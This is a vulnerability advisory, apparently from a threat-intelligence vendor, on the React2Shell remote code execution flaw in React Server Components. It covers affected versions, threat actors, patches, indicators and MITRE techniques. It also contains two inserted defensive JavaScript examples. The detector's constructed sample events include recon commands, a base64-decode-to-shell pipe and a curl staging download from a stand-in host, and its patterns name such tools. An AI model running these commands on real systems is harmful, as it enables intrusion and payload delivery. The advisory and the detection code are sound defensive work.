React2Shell Flaw in React Server Components Under Active Attack

Red | Vulnerability Report
CVE-2025-55182, known as React2Shell, is a critical (CVSS 10.0) unauthenticated remote code execution vulnerability in Meta's React Server Components, caused by unsafe deserialization in the Flight protocol. It affects React 19.x and the frameworks that bundle it, notably Next.js 15.x and 16.x, and allows an attacker to trigger arbitrary server-side JavaScript execution with a single crafted POST request. Because exploitation is near-reliable and requires minimal effort, internet-exposed React applications face widespread compromise. Exploitation began within days of public disclosure on December 3, 2025, with multiple threat actors, including Earth Lamia, Jackpot Panda, and UNC5174, deploying cryptominers, webshells, Cobalt Strike beacons, and persistent backdoors. CISA added the vulnerability to its KEV catalog on December 5, 2025, and mass exploitation was observed globally on December 8, 2025. Immediate patching to fixed React Server Components versions (React 19.0.1, 19.1.2, or 19.2.1; Next.js 15.5.7 or 16.0.7), together with WAF protections and aggressive security monitoring, is critical to mitigate the ongoing React2Shell mass scanning and attack campaigns.

Vulnerability Details

Critical Unsafe Deserialization Flaw in React Server Components

CVE-2025-55182, also called React2Shell, is a critical unauthenticated remote code execution vulnerability in React Server Components rated CVSS 10.0. The React2Shell issue stems from unsafe deserialization within the RSC Flight protocol, where server-function HTTP payloads are accepted and processed without proper input validation. This React vulnerability affects React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and packages such as react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Frameworks that bundle these React packages, including Next.js 15.x and 16.x using the App Router, are vulnerable by default to React2Shell attacks, making the security exposure extremely widespread across modern web applications built with React Server Components.

Near-Perfect Exploitation Reliability Without Authentication

The React2Shell vulnerability enables attackers to send crafted POST requests to exposed RSC endpoints, triggering arbitrary JavaScript execution on the server with near-perfect reliability and no authentication required. Following public disclosure of React2Shell on December 3, 2025, exploitation began within days, with mass scanning and opportunistic attacks observed across the internet targeting vulnerable React applications. Because Next.js and other frameworks enable RSC functionality by default without explicit developer configuration, millions of websites became vulnerable automatically, and many organizations do not realize their applications rely on React Server Components internally.

Multiple Threat Actors Weaponize React2Shell Rapidly

Real-world React2Shell exploitation has escalated rapidly following public disclosure. Attackers commonly perform reconnaissance using commands like uname, id, and whoami, often base64-encoded to evade detection, before deploying cryptominers, webshells, Cobalt Strike beacons, and persistent backdoors on compromised React servers. Multiple sophisticated threat actors, including China-nexus groups such as Earth Lamia, Jackpot Panda, and UNC5174 (also known as Uteus and CL-STA-1015), have weaponized the React2Shell flaw for espionage and cryptocurrency mining operations. The rapid weaponization demonstrates the severity and ease of exploiting this React vulnerability in internet-facing applications.

Immediate Patching Required to Prevent Ongoing Compromise

Mitigation of React2Shell requires immediate patching to secure React Server Components versions. React should be updated to 19.0.1, 19.1.2, or 19.2.1, and Next.js to 15.5.7, 16.0.7, or later, which contain the official React2Shell fixes. Organizations unable to patch React applications instantly should deploy WAF rules (including AWS WAF AWSManagedRulesKnownBadInputsRuleSet version 1.24 or later), network signatures, and endpoint monitoring to block malicious React2Shell payloads. Given the active exploitation and large attack surface across React and Next.js applications, security teams should prioritize asset inventories identifying RSC usage, continuous vulnerability scanning, and log analysis to prevent or disrupt ongoing React2Shell compromise attempts.

Recommendations

Apply Patched React and Next.js Versions Immediately: Ensure all applications using React Server Components are upgraded to the fixed versions released in early December 2025 to remediate React2Shell. Update React to 19.0.1, 19.1.2, or 19.2.1, and update Next.js to 15.5.7, 16.0.7, or later. After updating React packages, perform a full rebuild and redeployment of your application workloads. Validate the updated package versions in package.json, lockfiles, and CI/CD build artifacts to confirm that no React2Shell vulnerable versions remain in production use.

Inventory and Audit RSC Usage: Identify all applications using React Server Components across your environment. This includes not just Next.js applications but also React Router, Waku, RedwoodSDK, and any custom implementations using react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack packages. Prioritize internet-facing React applications for immediate React2Shell patching to reduce attack surface exposure.
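The version validation and RSC inventory steps above can be automated against a lockfile. The following is an added example, not Hive Pro's or the React project's code; it assumes the react-server-dom-* packages ship in lockstep with React so the same affected version list applies to them, and the lockfile it scans is constructed.

```javascript
// Added example, not Hive Pro's or the React project's code: audit a
// package-lock.json for the React / Next.js versions this advisory lists as
// affected, and flag any react-server-dom-* package as evidence of RSC usage.
// Assumption: react-server-dom-* ships in lockstep with React, so the same
// affected version list applies to it. The lockfile below is constructed.
const VULN_REACT = new Set(["19.0.0", "19.1.0", "19.1.1", "19.2.0"]);
const RSC_PKGS = new Set(["react-server-dom-webpack", "react-server-dom-parcel", "react-server-dom-turbopack"]);
const NEXT_FIXED = { 15: "15.5.7", 16: "16.0.7" }; // first fixed release per affected major

// Numeric major.minor.patch compare; prerelease/build suffixes are ignored.
function parseVersion(v) { return v.split(/[-+]/)[0].split(".").map(n => parseInt(n, 10) || 0); }
function cmpVersion(a, b) {
  const [pa, pb] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < 3; i++) if ((pa[i] || 0) !== (pb[i] || 0)) return (pa[i] || 0) < (pb[i] || 0) ? -1 : 1;
  return 0;
}

// lockfileVersion 2/3: keys look like "node_modules/next/node_modules/react",
// so the package name is whatever follows the last "node_modules/".
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "" || !meta.version) continue; // skip the root project entry
    const name = path.slice(path.lastIndexOf("node_modules/") + 13);
    const version = meta.version;
    if (name === "react" || RSC_PKGS.has(name)) {
      if (VULN_REACT.has(version)) findings.push({ path, name, version, status: "vulnerable" });
      else if (RSC_PKGS.has(name)) findings.push({ path, name, version, status: "rsc-present" });
    } else if (name === "next") {
      const fixed = NEXT_FIXED[parseVersion(version)[0]];
      if (fixed && cmpVersion(version, fixed) < 0) findings.push({ path, name, version, status: "vulnerable", fixedIn: fixed });
    }
  }
  return findings;
}

const SAMPLE_LOCK = { // constructed sample lockfile, not a real project
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/next": { version: "15.5.6" },
    "node_modules/react": { version: "19.2.0" },
    "node_modules/react-server-dom-webpack": { version: "19.2.1" },
    "node_modules/next/node_modules/react": { version: "19.2.1" },
  },
};
console.log(auditLockfile(SAMPLE_LOCK)); // two "vulnerable" findings and one "rsc-present"
```

Nested copies under a framework's own node_modules are walked too, which is where a stale React often survives after a top-level upgrade.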

Enable WAF Protections: If using Cloudflare, AWS WAF, or Vercel, enable RSC protection rules immediately to mitigate React2Shell exploitation attempts. AWS WAF AWSManagedRulesKnownBadInputsRuleSet version 1.24 or later includes updated rules specifically for CVE-2025-55182. These WAF protections provide defense-in-depth against React2Shell attacks but are not substitutes for applying official React and Next.js patches.

Enable Runtime Monitoring for Node.js Process Abuse: Configure your EDR or cloud workload protection tools to alert on unusual child processes spawned by Node.js runtimes, including shells, package managers, or network utilities. React2Shell exploitation frequently results in runtime execution of reconnaissance commands such as uname, whoami, curl, and base64-decoded scripts. Monitoring for these suspicious behaviors provides early detection of ongoing or successful React2Shell exploitation attempts against your infrastructure.
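As an added example of the runtime monitoring described above (not Hive Pro's or any EDR vendor's code), the following scores process-creation events for a Node.js parent spawning shells, recon commands, downloaders or base64-decoded scripts; the event schema and the sample events are constructed assumptions.

```javascript
// Added example, not Hive Pro's or any EDR vendor's code: score constructed
// process-creation events for the post-exploitation pattern this advisory
// describes, a Node.js runtime spawning shells, recon commands, downloaders or
// base64-decoded scripts. The event schema (pid, ppid, parent, image, cmdline)
// is an assumption, not any particular product's telemetry format.
const SUSPICIOUS_CHILDREN = new Set(["sh", "bash", "dash", "curl", "wget", "npm", "npx", "python3"]);
const RECON_RE = /\b(uname|id|whoami)\b/;
const DECODE_RE = /base64\s+(-d|--decode)\b/;
const DOWNLOAD_RE = /\b(curl|wget)\b.*https?:\/\//;

function basename(p) { return p.split("/").pop(); }

// Returns null for events that do not involve a Node.js parent or match no
// pattern; otherwise an alert whose severity rises with the number of reasons.
function evaluateEvent(ev) {
  if (basename(ev.parent) !== "node") return null;
  const reasons = [];
  const child = basename(ev.image);
  if (SUSPICIOUS_CHILDREN.has(child)) reasons.push(`node spawned ${child}`);
  if (RECON_RE.test(ev.cmdline)) reasons.push("recon command (uname/id/whoami)");
  if (DECODE_RE.test(ev.cmdline)) reasons.push("base64-decoded script");
  if (DOWNLOAD_RE.test(ev.cmdline)) reasons.push("remote download");
  if (reasons.length === 0) return null;
  return { pid: ev.pid, ppid: ev.ppid, severity: reasons.length >= 2 ? "high" : "medium", reasons };
}

// Each line is one JSON-encoded event, as an EDR export or SIEM stream might deliver it.
function scanEvents(lines) {
  return lines.map(line => evaluateEvent(JSON.parse(line))).filter(Boolean);
}

const SAMPLE_EVENTS = [ // constructed sample events, not real telemetry
  '{"pid":4101,"ppid":4100,"parent":"/usr/bin/node","image":"/bin/sh","cmdline":"sh -c \\"uname -a; id; whoami\\""}',
  '{"pid":4102,"ppid":4100,"parent":"/usr/bin/node","image":"/bin/sh","cmdline":"sh -c \\"echo ZWNobyBoaQ== | base64 -d | sh\\""}',
  '{"pid":4103,"ppid":4100,"parent":"/usr/bin/node","image":"/usr/bin/curl","cmdline":"curl -s http://example.invalid/stage.sh -o /tmp/s.sh"}',
  '{"pid":4104,"ppid":4100,"parent":"/usr/bin/node","image":"/bin/sh","cmdline":"sh -c \\"ls /app\\""}',
  '{"pid":4105,"ppid":1,"parent":"/usr/sbin/cron","image":"/bin/sh","cmdline":"sh -c \\"uname -r\\""}',
  '{"pid":4106,"ppid":4100,"parent":"/usr/bin/node","image":"/usr/bin/node","cmdline":"node worker.js"}',
];
console.log(JSON.stringify(scanEvents(SAMPLE_EVENTS), null, 2)); // 4 alerts: 3 high, 1 medium
```

The single-reason "medium" case (a Node.js parent spawning a shell for an ordinary command) is where build tooling produces noise, so tune the child list per workload before alerting on it.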

Indicators of Compromise (IoCs)


Domains: reactcdn[.]windowserrorapis[.]com, res[.]qiqigece[.]top

SHA256 Hashes: a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4, 4a759cbc219bcb3a1f8380a959307b39873fb36a9afd0d57ba0736ad7a02763b, and numerous additional file hashes associated with React2Shell exploitation campaigns

MITRE ATT&CK TTPs

React2Shell exploitation demonstrates tactics and techniques across the attack lifecycle:

Resource Development (TA0042): Obtain Capabilities: Exploits (T1588.005), Vulnerabilities (T1588.006)
Initial Access (TA0001): Exploit Public-Facing Application (T1190)
Execution (TA0002): Command and Scripting Interpreter: JavaScript (T1059.007), Unix Shell (T1059.004)
Persistence (TA0003): Server Software Component (T1505), Web Shell (T1505.003)
Privilege Escalation (TA0004): Exploitation for Privilege Escalation (T1068)
Defense Evasion (TA0005): Masquerading (T1036)
Discovery (TA0007): System Information Discovery (T1082), Process Discovery (T1057), File and Directory Discovery (T1083)
Collection (TA0009)
Command and Control (TA0011): Application Layer Protocol (T1071), Web Protocols (T1071.001), Ingress Tool Transfer (T1105) for deploying additional malicious payloads
Exfiltration (TA0010): Exfiltration Over C2 Channel (T1041), Exfiltration Over Web Service (T1567)
Impact (TA0040): Resource Hijacking for cryptocurrency mining (T1496)

